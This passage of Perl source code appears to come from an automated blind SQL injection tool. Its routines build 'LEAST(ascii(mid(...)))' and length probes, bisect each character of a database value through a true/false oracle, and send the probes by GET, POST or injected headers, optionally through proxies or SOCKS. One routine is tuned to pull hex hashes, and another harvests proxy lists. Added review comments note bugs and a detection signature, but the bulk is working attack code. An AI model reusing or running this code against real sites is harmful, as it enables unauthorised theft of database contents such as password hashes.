# $bbbl_url, $bl_query, $current, $chek_len, $chek_len1, $chek_len2,
# $chek_len3, $len, $i, $i3.
#
# Returns $len / 10 (numeric).  The division appears to compensate for
# phase 1 settling on one digit position more than the true digit count,
# whose probe (mid() past the end) yields an extra trailing "0" - TODO
# confirm against the oracle semantics before relying on it.
#
# NOTE(review): `break;` is not Perl loop control.  Without `use feature
# 'switch'` it is a bareword constant in void context (a no-op), so the
# inner loops never exit early and keep issuing probes for the remaining
# candidates; `last;` is the intended statement.  Same in len_check1.
sub len_check {
    $len_len = 1;
    $flag = 1;
      if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
    while($flag<4) {
         #$bl_query = $bbbl_url . $bl_plus . "and" . $bl_plus . "length(length(" . $bl_current . "))>" . $len_len . $bl_filtr;
         $bl_query = $bbbl_url . $bl_plus . "and(LEAST(length(length(" . $bl_current . ")),$len_len)=" . $len_len . ")" . $bl_filtr;
         $current = $bl_query;
         if($sql_flag == 0) {$chek_len = wr_check()}
         if($sql_flag == 1) {$chek_len = wr_check_POST()}
         if($sql_flag == 2) {$chek_len = wr_check_HEADER()}
         $len_len++;
         $flag++;
         # First "no" ends phase 1; undo the increment made above.
         if ($chek_len == 0) {
             $len_len--;
             $flag = 4;
         }
    }
    $len = '';
    $i = 1;
    while ($i <= $len_len) {
         #$bl_query = $bbbl_url . $bl_plus . "and" . $bl_plus . "mid(length(" . $bl_current . ")," .$i. ",1)<5". $bl_filtr;
         $bl_query = $bbbl_url . $bl_plus . "and(GREATEST(mid(length(" . $bl_current . ")," .$i. ",1),5)=5)". $bl_filtr;
         if($sql_flag == 0) {$chek_len1 = wr_check()}
         if($sql_flag == 1) {$chek_len1 = wr_check_POST()}
         if($sql_flag == 2) {$chek_len1 = wr_check_HEADER()}
         if($chek_len1 == 1) {
                  # Digit is 0..4: test each candidate in turn.
                  $i3 = 0;
              while ($i3 < 5) {
           $bl_query = $bbbl_url . $bl_plus . "and" . $bl_plus . "mid(length(" . $bl_current . ")," .$i. ",1)=" . $i3 . $bl_filtr;
                   if($sql_flag == 0) {$chek_len2 = wr_check()}
                   if($sql_flag == 1) {$chek_len2 = wr_check_POST()}
                   if($sql_flag == 2) {$chek_len2 = wr_check_HEADER()}
                   if($chek_len2 == 1) {
                        $len .= $i3;
                        break;
                   }
                  $i3++;
              }
            } else {
                 # Digit is 5..9.
                 $i3 = 5;
                 while ($i3 <= 9) {
                    $bl_query = $bbbl_url . $bl_plus . "and(mid(length(" . $bl_current . ")," .$i. ",1)=" . $i3 . ")" . $bl_filtr;
                            if($sql_flag == 0) {$chek_len3 = wr_check()}
                            if($sql_flag == 1) {$chek_len3 = wr_check_POST()}
                            if($sql_flag == 2) {$chek_len3 = wr_check_HEADER()}
                            if($chek_len3 == 1) {
                               $len .= $i3;
                               break;
                            }
                    $i3++;
                         }
          }
    $i++;
    }
    return ($len/10);
}
# Variant of len_check whose probes omit the leading "and" connective -
# presumably for injection points where the caller already supplies the
# connective (verify against the call sites).  Phase 1 also starts
# $len_len at 0 instead of 1, which costs one extra probe but ends on the
# same digit count.
#
# Same globals read and written as len_check; returns $len / 10.
#
# NOTE(review): `break;` is a no-op bareword here as well (see len_check);
# `last;` is the intended loop exit.
sub len_check1 {
    $len_len = 0;
    $flag = 1;
       if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
    while($flag<4) {
         #$bl_query = $bbbl_url . $bl_plus . "length(length(" . $bl_current . "))>" . $len_len . $bl_filtr;
         $bl_query = $bbbl_url . $bl_plus . "(LEAST(length(length(" . $bl_current . ")),$len_len)=".$len_len . ")" . $bl_filtr; #- WORK
         $current = $bl_query;
         if($sql_flag == 0) {$chek_len = wr_check()}
         if($sql_flag == 1) {$chek_len = wr_check_POST()}
         if($sql_flag == 2) {$chek_len = wr_check_HEADER()}
         $len_len++;
         $flag++;
         # First "no" ends phase 1; undo the increment made above.
         if ($chek_len == 0) {
             $len_len--;
             $flag = 4;
         }
    }
    $len = '';
    $i = 1;
    while ($i <= $len_len) {
         $bl_query = $bbbl_url . $bl_plus . "(GREATEST(mid(length(" . $bl_current . ")," .$i. ",1),5)=5)" .$bl_filtr;
         if($sql_flag == 0) {$chek_len1 = wr_check()}
         if($sql_flag == 1) {$chek_len1 = wr_check_POST()}
         if($sql_flag == 2) {$chek_len1 = wr_check_HEADER()}
         if($chek_len1 == 1) {
                  # Digit is 0..4: test each candidate in turn.
                  $i3 = 0;
              while ($i3 < 5) {
           $bl_query = $bbbl_url . $bl_plus . "(mid(length(" . $bl_current . ")," .$i. ",1)=" . $i3 . ")" . $bl_filtr;
                   if($sql_flag == 0) {$chek_len2 = wr_check()}
                   if($sql_flag == 1) {$chek_len2 = wr_check_POST()}
                   if($sql_flag == 2) {$chek_len2 = wr_check_HEADER()}
                   if($chek_len2 == 1) {
                        $len .= $i3;
                        break;
                   }
                  $i3++;
              }
            } else {
                 # Digit is 5..9.
                 $i3 = 5;
                 while ($i3 <= 9) {
                    $bl_query = $bbbl_url . $bl_plus . "(mid(length(" . $bl_current . ")," .$i. ",1)=" . $i3 . ")" . $bl_filtr;
                            if($sql_flag == 0) {$chek_len3 = wr_check()}
                            if($sql_flag == 1) {$chek_len3 = wr_check_POST()}
                            if($sql_flag == 2) {$chek_len3 = wr_check_HEADER()}
                            if($chek_len3 == 1) {
                               $len .= $i3;
                               break;
                            }
                    $i3++;
                         }
          }
    $i++;
    }
    return ($len/10);
}
# Recovers one character of $bl_current - the one at position $ii (a
# package global set by the caller) - by bisecting its ASCII code in the
# range 0..255 through the boolean oracle selected by $sql_flag.
#
# Each probe asks "LEAST(ascii(mid(x,$ii,1)), $srd) = $srd", i.e. whether
# the code is >= $srd.  "Yes" raises $min to $srd+1, "no" lowers $max to
# $srd, until the interval is one wide.  A final probe at $min settles
# which of the two remaining candidates it is.
#
# No arguments.  Reads globals $sql_flag, $bl_url, $sql_post, $sql_header,
# $bl_plus, $bl_current, $bl_filtr, $ii; overwrites globals $max, $min,
# $srd, $bbbl_url, $bl_query, $chek_len4, $chek_len5.
# Returns the character as chr(code).
#
# NOTE(review): from the defending side, the repeated "LEAST(ascii(mid("
# probe with a changing integer, ~8-9 requests per character, is a
# distinctive signature for request-log and WAF detection of this pattern.
sub get_res {
   $max = 255;
   $min = 0;
   $srd = 127;
       if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
   while (($max - $min)> 1) {
          $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$srd)=" . $srd .  ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len4 = wr_check()}
        if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
        if($chek_len4 == 1) {
              $min = $srd + 1;
          } else {
              $max = $srd;
          }
          $srd  = int(($max + $min)/2);
   }
   # Tie-break between the last two candidates.
   $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len5 = wr_check()}
        if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
   if($chek_len5 == 1) {
        return chr(($max-1));
   } else {
        return chr(($min-1));
   }
}
# Same bisection as get_res, but the probe is emitted without the leading
# "and" connective (presumably the caller supplies it - verify at the call
# sites).  Same globals read and written; returns chr(code) of the
# character at position $ii of $bl_current.
sub get_res1 {
   $max = 255;
   $min = 0;
   $srd = 127;
       if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
   while (($max - $min)> 1) {
          $bl_query = $bbbl_url . $bl_plus . "(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$srd)=" . $srd . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len4 = wr_check()}
        if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
        if($chek_len4 == 1) {
              $min = $srd + 1;
          } else {
              $max = $srd;
          }
          $srd  = int(($max + $min)/2);
   }
   # Tie-break between the last two candidates.
   $bl_query = $bbbl_url . $bl_plus . "(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len5 = wr_check()}
        if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
   if($chek_len5 == 1) {
        return chr(($max-1));
   } else {
        return chr(($min-1));
   }
}
# Identical bisection to get_res (with the "and" connective), except the
# result is returned as the numeric ASCII code rather than chr() of it.
# Same globals read and written.
sub get_res_normal {
   $max = 255;
   $min = 0;
   $srd = 127;
          if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
   while (($max - $min)> 1) {
        $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$srd)=" . $srd .  ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len4 = wr_check()}
        if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
        if($chek_len4 == 1) {
              $min = $srd + 1;
          } else {
              $max = $srd;
          }
          $srd  = int(($max + $min)/2);
   }
   # Tie-break between the last two candidates; returns the code, not chr().
   $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min .  ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len5 = wr_check()}
        if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
   if($chek_len5 == 1) {
        return ($max-1);
   } else {
        return ($min-1);
   }
}
# get_res_normal without the leading "and" connective (cf. get_res1).
# Returns the numeric ASCII code of the character at position $ii of
# $bl_current.  Same globals read and written as get_res.
sub get_res_normal1 {
   $max = 255;
   $min = 0;
   $srd = 127;
        if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
   while (($max - $min)> 1) {
          $bl_query = $bbbl_url . $bl_plus . "(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),".$srd.")=" . $srd .  ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len4 = wr_check()}
        if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
        if($chek_len4 == 1) {
              $min = $srd + 1;
          } else {
              $max = $srd;
          }
          $srd  = int(($max + $min)/2);
   }
   # Tie-break between the last two candidates; returns the code, not chr().
   $bl_query = $bbbl_url . $bl_plus . "(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len5 = wr_check()}
        if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
   if($chek_len5 == 1) {
        return ($max-1);
   } else {
        return ($min-1);
   }
}
# get_res with the search interval narrowed to ASCII 48..108 (midpoint 75),
# which covers the hexadecimal digit characters ("0".."9" = 48..57,
# "a".."f" = 97..102).  Fewer probes per character than the full 0..255
# range; only valid when the value at position $ii is known to be a hex
# digit.  Same globals read and written as get_res; returns chr(code).
sub md5_turbo {
   $max = 108;
   $min = 48;
   $srd = 75;
        if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
   while (($max - $min)> 1) {
          $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$srd)=" . $srd . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len4 = wr_check()}
        if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
        if($chek_len4 == 1) {
              $min = $srd + 1;
          } else {
              $max = $srd;
          }
          $srd  = int(($max + $min)/2);
   }
   # Tie-break between the last two candidates.
   $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len5 = wr_check()}
        if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
   if($chek_len5 == 1) {
        return chr(($max-1));
   } else {
        return chr(($min-1));
   }
}
# Bisects a single decimal digit (0..9, midpoint 4) at position $ii of
# $bl_current.  Unlike get_res the probe compares mid() directly against
# the integer, without ascii(), and the result is returned as the number
# itself.  Same globals read and written as get_res.
sub get_res_count {
   $max = 9;
   $min = 0;
   $srd = 4;
        if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
   while (($max - $min)> 1) {
          $bl_query = $bbbl_url . $bl_plus . "and(LEAST(mid(" . $bl_current . "," .$ii. ",1),$srd)=" . $srd . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len4 = wr_check()}

        if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
        if($chek_len4 == 1) {
              $min = $srd + 1;
          } else {
              $max = $srd;
          }
          $srd  = int(($max + $min)/2);
   }
   # Tie-break between the last two candidates.
   $bl_query = $bbbl_url . $bl_plus . "and(LEAST(mid(" . $bl_current . "," .$ii. ",1),$min)=" . $min  . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len5 = wr_check()}
        if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
   if($chek_len5 == 1) {
        return ($max-1);
   } else {
        return ($min-1);
   }
}
# Same binary search as get_res_count(), with one difference: the probe is
# emitted without the leading "and", so whatever precedes the LEAST(...)
# condition comes entirely from $bl_plus.  All other behaviour, the
# package-global state it uses and the non-reentrancy caveat are identical.
# Returns ($max-1) or ($min-1), whichever the final probe selects.
sub get_res_count1 {
   $max = 9;
   $min = 0;
   $srd = 4;
        # Base string the probe is appended to: URL, POST body or header value.
        if($sql_flag == 0) {$bbbl_url =  $bl_url}
        if($sql_flag == 1) {$bbbl_url =  $sql_post}
        if($sql_flag == 2) {$bbbl_url =  $sql_header}
   while (($max - $min)> 1) {
          # Probe: is the character at offset $ii >= $srd ?  (no "and" prefix)
          $bl_query = $bbbl_url . $bl_plus . "(LEAST(mid(" . $bl_current . "," .$ii. ",1),$srd)=" . $srd  . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len4 = wr_check()}
        if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
        if($chek_len4 == 1) {
              $min = $srd + 1;
          } else {
              $max = $srd;
          }
          $srd  = int(($max + $min)/2);
   }
   # Final probe against the lower bound decides between the last two candidates.
   $bl_query = $bbbl_url . $bl_plus . "(LEAST(mid(" . $bl_current . "," .$ii. ",1),$min)=" . $min . ")" . $bl_filtr;
        if($sql_flag == 0) {$chek_len5 = wr_check()}
        if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
        if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
   if($chek_len5 == 1) {
        return ($max-1);
   } else {
        return ($min-1);
   }
}
  9925.  
# Issues one HTTP POST of $sql_post to path $current on $host and returns
# the raw response text as a string (see the read loops for what is
# dropped).  When $current or $sql_post is empty the body is skipped and the
# sub falls off the end with a false value.  The transport is chosen by
# globals, in this order:
#   $get_method != 0   -> LWP::Simple::get($current)
#   $https_flag != 0   -> req(...) helper, defined elsewhere in the file
#   $socks_check != 0  -> request text placed in the global $query and sent
#                         by socks_get(), defined elsewhere in the file
#   $use_proxy != 0    -> raw socket to $current_proxy_host:$current_proxy_port
#   otherwise          -> raw socket to $host on port 80
# Every raw-socket path is plaintext; $cookie (a session id) and the POST
# body travel unencrypted.  Uses only package globals; not reentrant.
sub scan_url_POST {
$res = "";
if($current && $sql_post){
if ($test_mode==1) {
    print "===============================================\n";
    print "URL: $current\n";
    print "POST query: $sql_post\n";
    print "===============================================\n";
}
# Content-Length is computed from $sql_post alone.
$lsd=length $sql_post;
if ($get_method == 0) {
if ($https_flag == 0) {
   if ($socks_check == 0) {
       if ($use_proxy == 0) {
            # Direct connection; a failed connect silently yields $res = "".
            if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "POST $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    # Non-standard header name; the socks branch below uses "Referer".
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Content-Type: application/x-www-form-urlencoded\n";
                print $socket "Content-Length: $lsd\n";
                print $socket "Connection: close\n\n";
                print $socket $sql_post ."\n";
                $socket->autoflush(1);
                # The outer <$socket> consumes the first response line (the
                # status line) without appending it; the inner loop collects
                # the rest of the headers and the body into $res.
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                }
                close $socket;
                if ($test_mode==1) {print $res}
            }
       } else {
            # Same request, sent through the current HTTP proxy instead.
            if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "POST $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Content-Type: application/x-www-form-urlencoded\n";
                print $socket "Content-Length: $lsd\n";
                print $socket "Connection: close\n\n";
                print $socket $sql_post ."\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res  .= $_ while <$socket>;
                }
                close $socket;
                if ($test_mode==1) {print $res}
            }
      }
   } else {
      # SOCKS path: the whole request is assembled as text in the package
      # global $query (the "our" makes that explicit) and socks_get() is
      # expected to read it from there.  Line terminators here mix \r\n and \n.
      $check_url = $current;
      $check_host = $host;
    if ($cookie) {
      our $query = "POST $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Cookie: $cookie\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Content-Type: application/x-www-form-urlencoded\n"
           . "Content-Length: $lsd\n"
           . "Connection: close\n\n"
           .  $sql_post ."\n";
    } else {
      our $query = "POST $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Content-Type: application/x-www-form-urlencoded\n"
           . "Content-Length: $lsd\n"
           . "Connection: close\n\n"
           . $sql_post ."\n";
    }
     $res = socks_get();
     if ($test_mode==1) {print $res}
   }
} else {
   # NOTE(review): on the HTTPS path req() is asked for a GET, so $sql_post
   # does not appear to be sent at all here — confirm against req().
   $res = req($host, $current, 'GET', 0, $ck1);
   if ($test_mode==1) {print $res}
}
} else {
   # "use" is compile-time: LWP::Simple is loaded for the whole file even if
   # this branch never runs.  get() receives only the URL, so $cookie,
   # $referer, $user_agent, proxy and timeout settings are not applied here.
   use LWP::Simple;
   $res = get($current);
   if ($test_mode==1) {print $res}
}
  return  $res;
}
}
# Variant of scan_url_POST() where the payload travels in a request header:
# $sql_header_query is written verbatim as its own header line whenever
# $sql_header is set.  The request carries no body; the HTTP verb is taken
# from the global $method (presumably reassigned to the verb string
# elsewhere in the file — verify).  Returns the raw response text, or a false
# value when $current or $sql_header_query is empty.  Transport selection
# ($get_method, $https_flag, $socks_check, $use_proxy) is the same as in
# scan_url_POST(); all raw-socket paths are plaintext on port 80.
# Note the entry guard tests $sql_header_query while the header itself is
# emitted under an $sql_header test.
sub scan_url_HEADER {
$res = "";
if($current && $sql_header_query){
if ($test_mode==1) {
    print "===============================================\n";
    print "URL: $current\n";
    print "HEADER query: $sql_header_query\n";
    print "===============================================\n";
}
if ($get_method == 0) {
if ($https_flag == 0) {
   if ($socks_check == 0) {
       if ($use_proxy == 0) {
            # Direct connection; a failed connect silently yields $res = "".
            if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    # Non-standard header name; the socks branch below uses "Referer".
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
               # Injected header line, sent as-is (no escaping or validation).
               if ($sql_header) {
                    print $socket "$sql_header_query\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                # Content-Type is sent although no body follows.
                print $socket "Content-Type: application/x-www-form-urlencoded\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                # The outer <$socket> consumes the first response line (the
                # status line) without appending it; the inner loop collects
                # the rest into $res.
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                }
                close $socket;
                if ($test_mode==1) {print $res}
            }
       } else {
            # Same request, sent through the current HTTP proxy instead.
            if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                if ($sql_header) {
                    print $socket "$sql_header_query\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Content-Type: application/x-www-form-urlencoded\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res  .= $_ while <$socket>;
                }
                close $socket;
                if ($test_mode==1) {print $res}
            }
      }
   } else {
      # SOCKS path: request text is built in the package global $query for
      # socks_get() (defined elsewhere).  Four variants cover cookie / no
      # cookie and header / no header; only the two with a header include
      # the Content-Type line.
      $check_url = $current;
      $check_host = $host;
    if ($cookie) {
        if ($sql_header) {
          our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Cookie: $cookie\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Content-Type: application/x-www-form-urlencoded\n"
           . "$sql_header_query\r\n"  
           . "Connection: close\r\n\r\n";
        } else {
           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Cookie: $cookie\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";

        }

    } else {
        if ($sql_header) {
          our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Content-Type: application/x-www-form-urlencoded\n"
           . "$sql_header_query\r\n"  
           . "Connection: close\r\n\r\n";
        } else {
           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";

        }
    }
     $res = socks_get();
     if ($test_mode==1) {print $res}
   }
} else {
   # NOTE(review): the HTTPS helper is called with a fixed 'GET' and no
   # header argument, so $sql_header_query does not appear to reach req().
   $res = req($host, $current, 'GET', 0, $ck1);
   if ($test_mode==1) {print $res}
}
} else {
   # Compile-time "use": LWP::Simple is loaded for the whole file.  get()
   # takes only the URL, so none of the header settings above apply here.
   use LWP::Simple;
   $res = get($current);
   if ($test_mode==1) {print $res}
}
  return  $res;
}
}
# Plain request variant: fetches path $current from $host with verb $method
# and no body, returning the raw response text (or a false value when
# $current is empty).  Transport selection ($get_method, $https_flag,
# $socks_check, $use_proxy) is the same as in scan_url_POST(); all
# raw-socket paths are plaintext on port 80 and carry $cookie in clear.
# The direct and proxy branches are not identical: the proxy branch omits
# the referer line and adds the $sql_header_query line when $sql_header is
# set, the direct branch does the opposite.
sub scan_url {
       $res = "";
if($current){
if ($test_mode==1) {
    print "===============================================\n";
    print "URL: $current\n";
    print "===============================================\n";
}
if ($get_method == 0) {
if ($https_flag == 0) {
   if ($socks_check == 0) {
       if ($use_proxy == 0) {
            # Direct connection; a failed connect silently yields $res = "".
            if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    # Non-standard header name; the socks branch below uses "Referer".
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                # The outer <$socket> consumes the first response line (the
                # status line) without appending it; the inner loop collects
                # the rest into $res.
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                }
                close $socket;
                if ($test_mode==1) {print $res}
            }
       } else {
            # Through the current HTTP proxy.  No referer here, but the
            # injected header line is emitted when $sql_header is set.
            if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                if ($sql_header) {
                    print $socket "$sql_header_query\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res  .= $_ while <$socket>;
                }
                close $socket;
                if ($test_mode==1) {print $res}
            }
      }
   } else {
      # SOCKS path: request text is built in the package global $query for
      # socks_get() (defined elsewhere).
      $check_url = $current;
      $check_host = $host;
    if ($cookie) {
           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Cookie: $cookie\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";
    } else {
           our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";
    }
     $res = socks_get();
     if ($test_mode==1) {print $res}
   }
} else {
   # HTTPS helper, defined elsewhere; always a GET regardless of $method.
   $res = req($host, $current, 'GET', 0, $ck1);
   if ($test_mode==1) {print $res}
}
} else {
   # Compile-time "use": LWP::Simple is loaded for the whole file.  get()
   # takes only the URL, so none of the header settings above apply here.
   use LWP::Simple;
   $res = get($current);
   if ($test_mode==1) {print $res}
}
  return  $res;
}
}
# Fetches path $current from $host (directly, or through the current proxy
# when $use_proxy is set), pulls every "a.b.c.d:port" token out of the
# response with a regex, prints each one and appends it to the FILE1
# filehandle — which must already be open; this sub does not open it — and
# finally prints how many were found.  The request itself follows the same
# plaintext port-80 pattern as scan_url().  Returns nothing meaningful
# (value of the last statement).
sub grab_proxy {
       $res = "";
       if ($use_proxy == 0) {
            if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
